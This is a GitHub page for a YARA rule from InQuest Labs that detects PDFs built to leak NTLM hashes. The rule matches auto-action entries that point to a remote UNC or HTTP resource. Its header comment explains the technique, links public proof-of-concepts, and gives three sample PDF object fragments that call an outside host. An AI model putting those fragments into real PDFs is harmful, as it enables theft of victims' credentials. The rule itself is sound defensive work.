-
Notifications
You must be signed in to change notification settings - Fork 55
/
NTLM_Credentials_Theft_via_PDF_Files.rule
64 lines (51 loc) · 2.39 KB
/
NTLM_Credentials_Theft_via_PDF_Files.rule
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
/*
This signature detects Adobe PDF files that reference a remote UNC object for the purpose of leaking NTLM hashes.
New methods for NTLM hash leaks are discovered from time to time. This particular one is triggered upon opening of a
malicious crafted PDF. Original write-up from CheckPoint:
https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
Public proof-of-concepts:
https://github.com/deepzec/Bad-Pdf
https://github.com/3gstudent/Worse-PDF
Requirements:
/AA for Auto Action
/O for open is functionally equivalent to /C for close.
/S + /GoToE (Embedded) can be swapped with /GoToR (Remote).
/D location reference.
/F the UNC reference.
Multiple different arrangements, example one:
/AA <<
/O <<
/F (\\\\10.20.30.40\\test)
/D [ 0 /Fit]
/S /GoToR
>>
example two:
/AA <<
/C <<
/D [ 0 /Fit]
/S /GoToE
/F (\\\\10.20.30.40\\test)
>>
example three:
/AA <<
/O <<
/D [ 0 /Fit]
/F (\\\\10.20.30.40\\test)
/S /GoToR
>>
Multiple protocols supported for the /F include, both http and UNC.
*/
rule NTLM_Credential_Theft_via_PDF
{
meta:
Author = "InQuest Labs"
URL = "https://github.com/InQuest/yara-rules"
Description = "This signature detects Adobe PDF files that reference a remote UNC object for the purpose of leaking NTLM hashes."
strings:
// we have three regexes here so that we catch all possible orderings but still meet the requirement of all three parts.
$badness1 = /\s*\/AA\s*<<\s*\/[OC]\s*<<((\s*\/\D\s*\[[^\]]+\])(\s*\/S\s*\/GoTo[ER])|(\s*\/S\s*\/GoTo[ER])(\s*\/\D\s*\[[^\]]+\]))\s*\/F\s*\((\\\\\\\\[a-z0-9]+\.[^\\]+\\\\[a-z0-9]+|https?:\/\/[^\)]+)\)/ nocase
$badness2 = /\s*\/AA\s*<<\s*\/[OC]\s*<<\s*\/F\s*\((\\\\\\\\[a-z0-9]+\.[^\\]+\\\\[a-z0-9]+|https?:\/\/[^\)]+)\)((\s*\/\D\s*\[[^\]]+\])(\s*\/S\s*\/GoTo[ER])|(\s*\/S\s*\/GoTo[ER])(\s*\/\D\s*\[[^\]]+\]))/ nocase
$badness3 = /\s*\/AA\s*<<\s*\/[OC]\s*<<((\s*\/\D\s*\[[^\]]+\])\s*\/F\s*\((\\\\\\\\[a-z0-9]+\.[^\\]+\\\\[a-z0-9]+|https?:\/\/[^\)]+)\)(\s*\/S\s*\/GoTo[ER])|(\s*\/S\s*\/GoTo[ER])\s*\/F\s*\(\\\\\\\\[a-z0-9]+.[^\\]+\\\\[a-z0-9]+\)(\s*\/\D\s*\[[^\]]+\]))/ nocase
condition:
for any i in (0..1024) : (uint32be(i) == 0x25504446) and any of ($badness*)
}